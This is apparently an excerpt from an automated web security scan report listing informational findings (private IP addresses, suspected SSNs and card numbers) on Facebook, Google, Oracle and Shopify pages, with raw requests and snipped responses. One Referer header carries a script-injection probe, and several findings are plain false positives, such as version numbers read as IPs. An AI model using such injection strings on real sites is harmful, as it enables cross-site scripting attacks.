The following RFC 1918 IP address was disclosed in the response:

10.54.230.52

Request

GET /plugins/like.php?href=http://blogs.oracle.com/oracleopenworld/entry/sting_q_a_part_two&layout=button_count&show_faces=false&width=126&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

23.14. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.215.49

Request

GET /plugins/like.php?href=http://blogs.oracle.com/oracleopenworld/entry/intelligent_performance&layout=button_count&show_faces=false&width=126&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

23.15. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.18.46

Request

GET /plugins/like.php?action=recommend&api_key=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd910adb4%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

23.16. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.109.55

Request

GET /plugins/like.php?app_id=165670856825683&href=http://www.dove.us/Products/Hair/default.aspx?ba088 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

23.17. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.227.37

Request

GET /plugins/like.php?http://blogs.oracle.com/oracleopenworld/entry/the_curious_case_of_identity&layout=button_count&show_faces=false&width=126&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

23.18. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.72.46

Request

Response

23.19. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.13.37

Request

Response

23.20. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.57.47

Request

Response

23.21. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.217.63

Request

Response

23.22. http://www.fekkai.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.0.0

Request

Response

23.23. http://www.google.com/sdch/StnTz5pY.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/StnTz5pY.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/StnTz5pY.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX
If-Modified-Since: Sat, 03 Sep 2011 05:07:34 GMT

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 06 Sep 2011 16:00:23 GMT
Date: Tue, 06 Sep 2011 16:43:10 GMT
Expires: Tue, 06 Sep 2011 16:43:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 124609

Domain: .google.com
Path: /search

<!doctype html> <head> <title> - Google Search</title> <script>window.google={kEI:" NMWJ_5AK_rfB8gw",kEXPI:"28505,288 30316,31303,31405",kCSI
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: YKq3QHbl0RwJ:www.autotrader.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car &hl=en&ct=clnk&gl=us&source=www.google.com onmousedown="return clk(this.hre
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:rZQjSq2ux10J:translate.reference.com/+Hzpd6vNFcrsJ:translate.google.com/+ &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' 9&hl=en&ct=clnk&gl=us&source=www.google.com','','',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &cd=3 onmousedown="return clk(this.href,'','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','',' >
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:H75rMPosXksJ:www.cars.com/+used+carOJ7l3PBi2ywJ:www.usedcars.com/+used+car1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=ww
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rnetlion.com/article/Direct-TV-vs-Dish-Network KvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account OHG47yeqhSoJ:www.directv.com/DTVAPP/content/contact_us
...[SNIP]...

23.24. http://www.oracle.com/technetwork/community/developer-vm/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/community/developer-vm/index.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.2.0.1
10.3.3.0
10.3.4.0

Request

GET /technetwork/community/developer-vm/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41112056590278304,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134004

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<span style="font-size: smaller;">Oracle WebLogic Server 10.3.3.0</span>
...[SNIP]...
<span style="font-size: smaller;"> Oracle XE Universal Database 10.2.0.1</span>
...[SNIP]...
<span style="font-size: smaller;">Oracle WebLogic Server 10.3.4.0</span>
...[SNIP]...

23.25. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/enterprise-edition/downloads/index.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.2.0.2
10.2.0.3
10.2.0.4
10.2.0.5

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=235;ecid=41084439950149140,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 179935

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</em> Release 2 (10.2.0.5) for Microsoft
Windows (64-bit Itanium) </a>
...[SNIP]...
</em> Release 2 (10.2.0.4) for MAC OS
X on Intel x86-64 </a>
...[SNIP]...
</em> Release 2 (10.2.0.4) for Microsoft
Windows Vista x64, Microsoft Windows Server 2008 R2 x64,
Windows 7 x64 </a>
...[SNIP]...
</em> Release 2 (10.2.0.3/10.2.0.4) for
Microsoft Windows Vista, Windows Server 2008, Windows
7 </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for HP Tru64
UNIX </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for HP OpenVMS
Alpha </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for OpenVMS
Itanium </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for Solaris
Operating System (x86) </a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for z/Linux
</a>
...[SNIP]...
</em> Release 2 (10.2.0.2) for z/OS (OS/390)
</a>
...[SNIP]...

23.26. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/windows/downloads/index-101290.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.1.0.4

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41156226034626734,0:1)
Date: Tue, 06 Sep 2011 16:09:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 198382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<span sab="3102">Oracle Developer Tools for Visual Studio .NET 10.1.0.4</span>
...[SNIP]...
<span sab="3133">Oracle Developer Tools for Visual Studio .NET 10.1.0.4</span>
...[SNIP]...

23.27. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/apex/downloads/index.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.0.3

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41118116789228163,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<p>Oracle Application Express 4.1 is fully supported through Oracle Support Services on all Editions (SE1, SE, and EE) of the Oracle database, 10.2.0.3 or higher with a valid Oracle Database Technical Support agreement.</p>
...[SNIP]...

23.28. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/jdev/downloads/index.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.0.1

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=270;ecid=41074600181168427,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163042

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

   var R1B1 = 'http://download.oracle.com/otn/linux/oracle10g/xe/10201/oracle-xe-univ-10.2.0.1-1.0.i386.rpm';
   var R1B2 = 'http://download.oracle.com/otn/linux/middleware/11g/wls/1035/wls1035_linux32.bin';
   var R1B3 = 'http://download.oracle.com/otn/linux/middleware/11g/111150/ofm_rcu_linux_11.
...[SNIP]...
R2A11 = 'http://download.oracle.com/otn/nt/middleware/11g/111140/ofm_b2b_doc_editor_win_11.1.1.4.0_disk1_1of1.zip';
   var R2B1 = 'http://download.oracle.com/otn/linux/oracle10g/xe/10201/oracle-xe-univ-10.2.0.1-1.0.i386.rpm';
   var R2B2 = 'http://download.oracle.com/otn/linux/middleware/11g/wls/wls1034_linux32.bin';
   var R2B3 = 'http://download.oracle.com/otn/linux/middleware/11g/111140/ofm_rcu_linux_11.1.1.4
...[SNIP]...

23.29. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/middleware/soasuite/downloads/index.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.0.1

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35879579537054133,0:1)
Date: Tue, 06 Sep 2011 16:09:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 252619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

   var R1B1 = 'http://download.oracle.com/otn/linux/oracle10g/xe/10201/oracle-xe-univ-10.2.0.1-1.0.i386.rpm';
   var R1B2 = 'http://download.oracle.com/otn/linux/middleware/11g/wls/1035/wls1035_linux32.bin';
   var R1B3 = 'http://download.oracle.com/otn/linux/middleware/11g/111150/ofm_rcu_linux_11.
...[SNIP]...
R2A11 = 'http://download.oracle.com/otn/nt/middleware/11g/111140/ofm_b2b_doc_editor_win_11.1.1.4.0_disk1_1of1.zip';
   var R2B1 = 'http://download.oracle.com/otn/linux/oracle10g/xe/10201/oracle-xe-univ-10.2.0.1-1.0.i386.rpm';
   var R2B2 = 'http://download.oracle.com/otn/linux/middleware/11g/wls/wls1034_linux32.bin';
   var R2B3 = 'http://download.oracle.com/otn/linux/middleware/11g/111140/ofm_rcu_linux_11.1.1.4
...[SNIP]...
</a> 10.2.0.1 does not meet the minimum version requirement for supported use, but will generally work in a personal development environment.<br />
...[SNIP]...
</a> 10.2.0.1 does not meet the minimum version requirement for supported use, but will generally work in a personal development environment.<br />
...[SNIP]...
</a> 10.2.0.1 (only supported on <strong>
...[SNIP]...
</a> 10.2.0.1 does not meet the minimum version requirement for supported use, but will generally work in a personal development environment.<br />
...[SNIP]...
</a> 10.2.0.1 does not meet the minimum version requirement for supported use, but will generally work in a personal development environment.<br />
...[SNIP]...
</a> 10.2.0.1 (only supported on <strong>
...[SNIP]...

23.30. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/oem/grid-control/downloads/index.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.1.0.2
10.1.0.3
10.2.0.3
10.2.0.4
10.2.0.5

Request

GET /technetwork/oem/grid-control/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=40974493081910025,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</i> Grid Control (10.2.0.5)</span>
...[SNIP]...
</i> Grid Control (10.2.0.4)</span>
...[SNIP]...
</i> Grid Control (10.2.0.3)</span>
...[SNIP]...
</i> Grid Control Release 1 (10.1.0.3)</span>
...[SNIP]...
</i> Grid Control Release 1 (10.1.0.2)</span>
...[SNIP]...
</em> Grid Control Management Agent Release 1 (10.1.0.2) for Windows Itanium</a>
...[SNIP]...
<a href="/technetwork/oem/grid-control/downloads/config-control-091160.html">Oracle Configuration Change Console Release 5 (10.2.0.5)</a>
...[SNIP]...

24. Social security numbers disclosed previous next
There are 6 instances of this issue:

http://assets.olark.com/a/assets/v0/site/7855-664-10-3086.js
http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html
http://www.shopify.com/admin/auth/login
http://www.shopify.com/examples
http://www.shopify.com/login
http://www.shopify.com/tour

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

24.1. http://assets.olark.com/a/assets/v0/site/7855-664-10-3086.js previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://assets.olark.com
Path:	/a/assets/v0/site/7855-664-10-3086.js

Issue detail

The following social security number was disclosed in the response:

664-10-3086

Request

GET /a/assets/v0/site/7855-664-10-3086.js?cb=1315341238985&v=Loader05574e0e48ef9633b51ee007f4f6bf5ff HTTP/1.1
Host: assets.olark.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/tour
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 06 Sep 2011 15:48:35 GMT
Content-Type: application/x-javascript
Content-Length: 2887
Last-Modified: Thu, 01 Sep 2011 19:41:44 GMT
Connection: close
P3P: CP='Olark does not have a P3P policy. Learn why here: http://olark.com/p3p'
Accept-Ranges: bytes

(function(){
olark.extend('GoogleAnalytics');

var isNewVersion = olark._ && olark._.versions && (olark._.versions.follow || olark._.versions.popout)
if(isNewVersion) {
...[SNIP]...
,"disableJSStyles":1,"corner_position":"BR","width":"320","left_margin":20,"hkey":"PHNwYW4gc3R5bGU9ImRpc3BsYXk6bm9uZSI+PGEgaWQ9ImhibGluazkiPjwvYT5odHRwOi8vd3d3Lm9sYXJrLmNvbTwvc3Bhbj4=","site_id":"7855-664-10-3086","operators":{}},"GoogleAnalytics":{"enabled":true,"enable_custom_variables":true,"had_conversation_page_slot_number":5,"had_conversation_session_slot_number":4,"had_conversation_visitor_slot_number":3,"track_chat_start_page":true}});
}else{
olark.configure(function(conf){
conf.system.site_id="7855-664-10-3086";
});
olark._.finish();
}
})();

24.2. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.oracle.com
Path:	/partners/en/opn-program/membership-resources/business-center/index.html

Issue detail

The following social security number was disclosed in the response:

120 65 0065

Request

Response

24.3. http://www.shopify.com/admin/auth/login previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.shopify.com
Path:	/admin/auth/login

Issue detail

The following social security number was disclosed in the response:

664-10-3086

Request

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Rack-Cache: fresh
X-Content-Digest: 38f4c37fa64459e11e554308ab3dd1ee00e72542
X-Runtime: 1645
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
X-Cacheable: NO:Not Cacheable
Content-Length: 15660
Date: Tue, 06 Sep 2011 15:41:17 GMT
X-Varnish: 1687908019
Age: 1
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('7855-664-10-3086');/*]]>
...[SNIP]...

24.4. http://www.shopify.com/examples previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.shopify.com
Path:	/examples

Issue detail

The following social security number was disclosed in the response:

664-10-3086

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "8f7c88edfb0c914b89bc76b6acab2982"
X-Rack-Cache: fresh
X-Content-Digest: b07dc9d86ea310a157a069084b0cda714abd7659
X-Runtime: 2553
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 19311
Date: Tue, 06 Sep 2011 15:34:06 GMT
X-Varnish: 1687907293 1687907271
Age: 12
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('7855-664-10-3086');/*]]>
...[SNIP]...

24.5. http://www.shopify.com/login previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.shopify.com
Path:	/login

Issue detail

The following social security number was disclosed in the response:

664-10-3086

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "5e6cd1cceddc58f0b1054bb20da87a2e"
X-Rack-Cache: fresh
X-Content-Digest: 3f0391ebb89e0d08d8add07de6cf12a5cb1d4dee
X-Runtime: 1746
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 15228
Date: Tue, 06 Sep 2011 15:40:58 GMT
X-Varnish: 1482397443 1482397441
Age: 108
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('7855-664-10-3086');/*]]>
...[SNIP]...

24.6. http://www.shopify.com/tour previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.shopify.com
Path:	/tour

Issue detail

The following social security number was disclosed in the response:

664-10-3086

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "16ce554bcc0e560a6719831237efac75"
X-Rack-Cache: fresh
X-Content-Digest: f28972877127f1924c2d86adc520840168285bb1
X-Runtime: 4033
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 24792
Date: Tue, 06 Sep 2011 15:33:55 GMT
X-Varnish: 1482396697 1482396684
Age: 150
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('7855-664-10-3086');/*]]>
...[SNIP]...

25. Credit card numbers disclosed previous next
There are 135 instances of this issue:

http://api.cnbc.com/api/movers/movers.asp
http://assets1.csc.com/es/downloads/7380_2.pdf
http://assets1.csc.com/lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf
http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf
http://education.oracle.com/education/jscripts/otn_nav1.js
https://education.oracle.com/education/jscripts/otn_nav1.js
http://www.oracle.com/ao/index.html
http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html
http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html
http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html
http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html
http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html
